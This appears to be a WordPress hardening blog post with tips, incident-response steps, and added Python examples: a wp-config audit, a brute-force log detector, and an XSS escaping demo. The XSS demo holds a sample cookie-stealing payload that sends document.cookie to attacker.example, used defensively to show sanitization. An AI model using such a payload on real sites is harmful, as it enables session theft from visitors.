“Oh no, my website has been hacked!” is heard more and more often these days. It doesn’t matter whether your site is small or big: every site is a target. Take some time today to put a few security measures in place. Sometimes a website is attacked by a person, but far more often the attacker is a “bot”, an automated program written by attackers that scans huge numbers of sites for known weaknesses such as outdated software and weak passwords. Because bots go after the easy targets, a few basic safeguards stop most of them.
If your site runs on WordPress, it can be extended through hooks, plugins and themes. That flexibility also means that serious security problems on a WordPress site are often not caused by WordPress itself but by third-party code. For instance, a form that accepts user input can be abused if the plugin handling it does not validate the data and escape it before passing it on to the database or the browser. There is no such thing as total security for a website, but you can prevent most problems before they happen.
TIPS to SECURE WORDPRESS
- Protect the admin account.
- Don’t use a user named “admin”: create a new administrator account with a different username and delete the original one (WordPress does not let you rename a user from the dashboard). Use a strong password of at least 14 characters that is not made of dictionary words, generate it with a password manager, and never reuse a login on another website. Then generate new secret keys and salts in wp-config.php; changing them invalidates every existing login cookie and forces all users to sign in again.
- Protect the wp-config.php file. It holds your database credentials and secret keys, so restrict its file permissions and block direct web access to it.
- Hide the WordPress version number. It is printed in the page source by default and tells bots exactly which known flaws to try.
- Disable the built-in theme and plugin editor if you don’t need it. An attacker who gets into the dashboard can otherwise use it to write PHP straight to your server.
- Change the database table prefix from the default wp_ before installing WordPress.
- Don’t rely on robots.txt to protect your WordPress files. It only tells well-behaved search engine crawlers what to skip; attack bots ignore it, and listing wp-admin or wp-includes in it simply advertises where they are.
- Scrutinize widgets, plugins and third-party code before installing them. Stick to actively maintained code from the official directory or a reputable vendor.
- Remove unused plugins and themes, and keep WordPress itself, all plugins and all themes up to date.
- Don’t approve comments unless you are sure they are genuine, and turn comments off if you don’t need them; spam comments are a common way to plant malicious links.
- Backups are a key part of your site’s security: after a compromise a clean backup may be your only way to recover. Schedule regular backups of both the database and the files, keep several generations, and store them somewhere other than the web server itself.
- Pay for security monitoring and/or install a security plugin. Sucuri, for example, offers monitoring and malware removal, and a good security plugin can block brute-force logins and alert you when files change.
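As an added example (not code from the original post or from WordPress), here is a small Python audit script that checks a wp-config.php for several of the settings in the list above: that all eight secret keys and salts have been replaced with long random values, that DISALLOW_FILE_EDIT turns off the theme and plugin editor, that the table prefix is not the default wp_, and that the file is not readable or writable by every account on the host. The two sample configurations are constructed for illustration, and the function and constant names are this example’s own.

```python
"""Audit a WordPress wp-config.php for the hardening settings discussed above.

Added example; not part of the original post or of WordPress. The sample
configuration texts below are constructed for illustration.
"""
import os
import re
import stat

# The eight secret keys/salts WordPress expects. Leaving the installer's
# placeholder text in place means your cookies are signed with a value
# that every other unconfigured site also uses.
SALT_KEYS = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
PLACEHOLDER = "put your unique phrase here"
MIN_SALT_LEN = 32  # example threshold; generated salts are 64 characters

STRING_DEFINE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")
FILE_EDIT_OFF = re.compile(r"define\(\s*'DISALLOW_FILE_EDIT'\s*,\s*true\s*\)")
TABLE_PREFIX = re.compile(r"\$table_prefix\s*=\s*'([^']*)'")


def audit_wp_config(text, mode):
    """Return a list of findings for the given wp-config.php contents.

    `text` is the file contents and `mode` its permission bits (as returned
    by stat.S_IMODE). An empty list means every check passed.
    """
    findings = []
    defines = dict(STRING_DEFINE.findall(text))

    for key in SALT_KEYS:
        value = defines.get(key)
        if value is None:
            findings.append(f"{key} is not defined")
        elif value == PLACEHOLDER or len(value) < MIN_SALT_LEN:
            findings.append(f"{key} is a placeholder or too short; regenerate it")

    if not FILE_EDIT_OFF.search(text):
        findings.append("DISALLOW_FILE_EDIT is not set to true (theme/plugin editor enabled)")

    prefix = TABLE_PREFIX.search(text)
    if prefix is None or prefix.group(1) == "wp_":
        findings.append("table prefix is the default 'wp_'")

    # World bits (0o007) mean any account on the host can read the DB password;
    # group write (0o020) lets other group members tamper with the file.
    if mode & 0o007:
        findings.append("wp-config.php is readable or writable by everyone on the host")
    elif mode & 0o020:
        findings.append("wp-config.php is writable by its group")

    return findings


def audit_file(path):
    """Audit a real wp-config.php on disk."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return audit_wp_config(text, stat.S_IMODE(os.stat(path).st_mode))


# Constructed sample: the shape of a freshly copied wp-config-sample.php.
WEAK_CONFIG = "\n".join(
    f"define( '{key}', 'put your unique phrase here' );" for key in SALT_KEYS
) + "\n$table_prefix = 'wp_';\n"

# Constructed sample: the same file after applying the tips above. The salt
# values are made-up 64-character strings standing in for generated ones.
HARDENED_CONFIG = "\n".join(
    f"define( '{key}', '{(key + '-').ljust(64, 'x')}' );" for key in SALT_KEYS
) + "\ndefine( 'DISALLOW_FILE_EDIT', true );\n$table_prefix = 'mysite7_';\n"


if __name__ == "__main__":
    for name, cfg, mode in (("weak", WEAK_CONFIG, 0o644), ("hardened", HARDENED_CONFIG, 0o640)):
        print(f"{name} config:")
        for finding in audit_wp_config(cfg, mode) or ["no findings"]:
            print("  -", finding)
```

Run it against a real install with `audit_file("/var/www/html/wp-config.php")`; anything it reports corresponds to one of the tips in the list above.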
If your site gets hacked:
- Remember the first rule in any emergency: don’t panic.
- Contact your web host for help.
- Make a full backup of the infected site before you change anything, so you can work out how the attacker got in and recover anything you delete by mistake.
- Change all your passwords (WordPress users, database, SFTP and hosting control panel) and generate new secret keys and salts in wp-config.php.
- Remove old themes, plugins and any other unused code from your server. Anything you don’t need is extra attack surface and a place for malicious files to hide.
- Update all the code on your server. You can reinstall WordPress core from the Updates page; reinstall themes and plugins from fresh copies rather than trusting the files already on disk.
- Check that file permissions are correct, especially on wp-config.php and the uploads directory, and look for PHP files in uploads, which should contain only media.
- Check any other sites on the same hosting account; a compromise often spreads between sites that share a server account.
Follow us for another post soon on web security, where we will discuss the importance of migrating your website to HTTPS. Contact us for help with website design and development.
TYPES of SECURITY PROBLEMS
Brute Force Attacks
Brute force attacks happen constantly. A program tries to log in to your admin dashboard by submitting password after password until one works, and using the “admin” username with a weak password makes its job easy. IMPORTANT TIP: use a strong password of 14 characters or more, not dictionary words, mixing upper and lower case letters with numbers and symbols. Use a password manager such as LastPass or a generator like http://strongpasswordgenerator.com to create it, and never use the same password in more than one place. You can also spot the attack itself: a long run of POST requests to wp-login.php from a single address in your web server log is its signature.
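The following Python script is an added example, not part of the original post. It reads web server access log lines in the common “combined” format, counts POST requests to wp-login.php per client address within a sliding time window, and reports addresses that cross a threshold. It also notes whether that address ever got a 302 redirect back from wp-login.php, which is how WordPress answers a successful login, so you can tell a failed brute-force run from one that got in. The log lines are constructed (TEST-NET addresses), and the thresholds and names are this example’s own choices.

```python
"""Spot a brute-force login run in a web server access log.

Added example, not part of the original post. The log lines below are
constructed in Apache/Nginx "combined" format for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def find_brute_force(lines, threshold=10, window_seconds=300):
    """Return {ip: {"attempts": n, "succeeded": bool}} for every address that
    POSTed to wp-login.php at least `threshold` times inside any span of
    `window_seconds`. "succeeded" is True if any of its attempts drew a 302,
    the redirect WordPress sends after a successful login."""
    window = timedelta(seconds=window_seconds)
    posts = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            posts[rec["ip"]].append((rec["ts"], rec["status"]))

    flagged = {}
    for ip, events in posts.items():
        events.sort()
        times = [ts for ts, _ in events]
        start = 0
        for end in range(len(times)):
            # slide the window start forward until it fits within window_seconds
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "attempts": len(events),
                    "succeeded": any(status == 302 for _, status in events),
                }
                break
    return flagged


def _line(ip, ts, method, path, status):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: one legitimate user who mistypes once, then an
# attacker firing a password every five seconds until the final 302.
SAMPLE_LOG = [
    _line("198.51.100.7", "10/Mar/2024:09:00:01 +0000", "GET", "/", 200),
    _line("198.51.100.7", "10/Mar/2024:09:00:09 +0000", "POST", "/wp-login.php", 200),
    _line("198.51.100.7", "10/Mar/2024:09:00:20 +0000", "POST", "/wp-login.php", 302),
] + [
    _line("203.0.113.5", f"10/Mar/2024:09:01:{s:02d} +0000", "POST", "/wp-login.php?action=login", 200)
    for s in range(0, 55, 5)
] + [
    _line("203.0.113.5", "10/Mar/2024:09:01:57 +0000", "POST", "/wp-login.php", 302),
]


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_LOG).items():
        outcome = "and got in" if info["succeeded"] else "without success"
        print(f"{ip}: {info['attempts']} login attempts {outcome}")
```

Point it at a real log with `find_brute_force(open("/var/log/apache2/access.log"))`; an address that is flagged with `succeeded` set is the one whose account password and sessions you reset first.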
Server Attacks
If an attacker gains access to your server, they can alter your content through the database or take the whole site down. Use SFTP rather than plain FTP (which sends your password unencrypted) to transfer files between your computer and the web server, and use strong passwords on every server account.
Denial of Service Attacks
DoS, or denial of service, attacks flood a web server with requests, usually from a program or a network of compromised machines, until it can no longer handle the load and stops responding. Your data is usually safe, but your site will not load until the bad traffic is blocked. Make sure your web host runs a firewall and has procedures in place for filtering this kind of traffic (most do now).
Cross Site Scripting
An attacker injects a client-side script into a page of your site so that it runs in your visitors’ browsers. That can let them steal cookies, hijack active sessions and bypass access controls, or send visitors to malicious pages. On a WordPress site the usual entry point is user-supplied content such as comments, search terms or form fields that a theme or plugin prints back into the page without escaping it. Keeping WordPress, themes and plugins up to date and having your host or a third party scan the site catches known XSS bugs in that code; the fix for code you write yourself is to validate input and escape every piece of untrusted text when it is output (WordPress provides esc_html(), esc_attr() and wp_kses() for this).
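The escaping point above is easiest to see in code. This Python example is added here and is not code from the original post or from WordPress: it renders a comment the unsafe way (untrusted text pasted straight into the markup) and the safe way (author name fully escaped, comment body passed through a small allowlist sanitizer that keeps a few formatting tags and http(s)/mailto links but drops scripts, event-handler attributes and javascript: URLs, in the spirit of WordPress’s wp_kses()). The payload string is constructed for illustration, and the class and function names are this example’s own.

```python
"""Unsafe versus escaped rendering of a blog comment (added example).

Not part of the original post or of WordPress. The payload below is a
constructed XSS attempt of the kind that gets pasted into comment forms.
"""
import html
from html.parser import HTMLParser

# Allowlist: tag -> attributes it may keep. Everything else is dropped.
ALLOWED = {"a": {"href"}, "b": set(), "i": set(), "em": set(), "strong": set()}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
DROP_CONTENT = {"script", "style"}  # drop these tags *and* the text inside them


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []  # stack of allowed tags we have emitted
        self.skip = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        allowed_attrs = ALLOWED.get(tag)
        if allowed_attrs is None:
            return  # unknown tag (img, iframe, svg...) vanishes; its text is kept
        pieces = [tag]
        for name, value in attrs:
            if name not in allowed_attrs or value is None:
                continue  # drops onclick=, onerror=, style= and friends
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue  # drops javascript: and data: links
            pieces.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(pieces) + ">")
        self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip:
                self.skip -= 1
            return
        if tag in self.open:
            # close back down to the matching tag so the output stays balanced
            while self.open:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if self.skip:
            return
        # convert_charrefs decoded entities for us; re-escape so text stays text
        self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:  # close anything the commenter left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_comment(body):
    """Keep harmless formatting, drop anything that can run script."""
    parser = _Sanitizer()
    parser.feed(body)
    return parser.result()


def render_comment_unsafe(author, body):
    """The bug: untrusted text concatenated straight into the page."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """The fix: plain text fully escaped, rich text passed through the allowlist."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {sanitize_comment(body)}</div>'


# Constructed payload: a link that runs script on click plus an inline script
# that ships the visitor's cookies to the attacker.
PAYLOAD = ('Nice post! <a href="javascript:alert(document.cookie)" onclick="steal()">click</a>'
           '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>')

if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe("<script>alert(1)</script>", PAYLOAD))
    print("safe:  ", render_comment_safe("<script>alert(1)</script>", PAYLOAD))
```

The unsafe renderer hands the browser a live `<script>` and a `javascript:` link; the safe one leaves the visitor with the harmless text `Nice post! <a>click</a>`.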